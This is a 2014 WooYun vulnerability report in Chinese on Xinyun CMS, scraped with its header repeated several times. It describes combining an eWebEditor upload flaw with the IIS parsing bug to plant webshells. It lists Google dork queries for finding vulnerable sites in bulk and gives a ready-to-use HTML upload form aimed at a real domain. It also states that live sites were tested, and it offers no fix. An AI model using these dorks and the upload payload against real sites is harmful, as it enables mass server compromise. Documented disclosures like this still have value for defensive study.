新云cms建站系统存在ewebeditor上传和iis解析漏洞可批量getshell

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-077161

漏洞标题：新云cms建站系统存在ewebeditor上传和iis解析漏洞可批量getshell

漏洞作者：小骇

提交时间：2014-09-24 15:37

修复时间：2014-12-20 15:38

公开时间：2014-12-20 15:38

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-09-24：细节已通知厂商并且等待厂商处理中
2014-09-29：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放
2014-11-23：细节向核心白帽子及相关领域专家公开
2014-12-03：细节向普通白帽子公开
2014-12-13：细节向实习白帽子公开
2014-12-20：细节向公众公开

简要描述：

详细说明：

新云cms建站系统存在ewebeditor上传和iis解析漏洞，可批量getshell.
利用ewebeditor上传漏洞可以新建一个1.asp的文件夹，再配合iis的解析漏洞就可以成功的拿到shell.
可通过谷歌获得大量的漏洞网站，关键字如下：
inurl:Showservices.asp?id=
inurl:showkbxx.asp?id=

可通过谷歌获得大量的漏洞网站，关键字如下：
inurl:Showservices.asp?id=
inurl:showkbxx.asp?id=

问题网址出现在：/admin/xyeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=1.asp

构造表单上传..EXP如下:<form action="http://www.zenitsoft.com//admin/xyeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=1.php"
method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>

以下网站都存在漏洞

漏洞证明：

通过构造的表单上传后，查看源代码，可直接看到上传后的路径

以下测试了几个网站作证明

修复方案：

你们有专业人员,懂得！

版权声明：转载请注明来源小骇@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-12-20 15:38

厂商回复：

漏洞评价：

2014-09-24 15:39 | Coody ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产；如遇接单收徒、绝非本人所...)

标题即为漏洞详情
2014-09-24 15:54 | 魇 ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子，但是除了他华...)

漏洞详情即为标题
2014-09-24 16:16 | 平凡 ( 路人 | Rank:0 漏洞数:1 | 平凡)

@魇漏洞详情即为标题
2014-09-24 16:47 | roker ( 普通白帽子 | Rank:357 漏洞数:108 )

标题即为漏洞详情
2014-09-28 11:37 | 乌帽子 ( 路人 | Rank:29 漏洞数:3 | 学习黑客哪家强 | 中国山东找蓝翔 | sql...)

提交错厂商了吧
2014-09-28 11:40 | 小骇 ( 普通白帽子 | Rank:330 漏洞数:143 )

@乌帽子靠，乌云弄错了
2014-09-30 22:01 | ki11y0u ( 普通白帽子 | Rank:104 漏洞数:23 | 好好学习，求带飞~~~~~~~~~~~~~~~~~~~~~~...)

标题即为漏洞详情
2014-12-21 10:24 | 用来怀念 ( 路人 | Rank:0 漏洞数:1 | 不是什么人都一定要去拥有，有的东西最好用...)

大马怎么这么屌？？
2014-12-21 10:33 | 小骇 ( 普通白帽子 | Rank:330 漏洞数:143 )

@用来怀念 @用来怀念呵呵，网上的马
2015-01-22 18:52 | 蛇精病 ( 路人 | Rank:23 漏洞数:10 | 你连棒棒糖都没有，还谈什么狗屁爱情？)

@xsser 提交错厂商了~~

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-077161

漏洞标题：新云cms建站系统存在ewebeditor上传和iis解析漏洞可批量getshell

相关厂商：yxcms.net

漏洞作者：小骇

提交时间：2014-09-24 15:37

修复时间：2014-12-20 15:38

公开时间：2014-12-20 15:38

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源小骇@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-077161

漏洞标题：新云cms建站系统存在ewebeditor上传和iis解析漏洞可批量getshell

相关厂商：yxcms.net

漏洞作者： 小骇

提交时间：2014-09-24 15:37

修复时间：2014-12-20 15:38

公开时间：2014-12-20 15:38

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-077161"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 小骇@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：小骇

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源小骇@乌云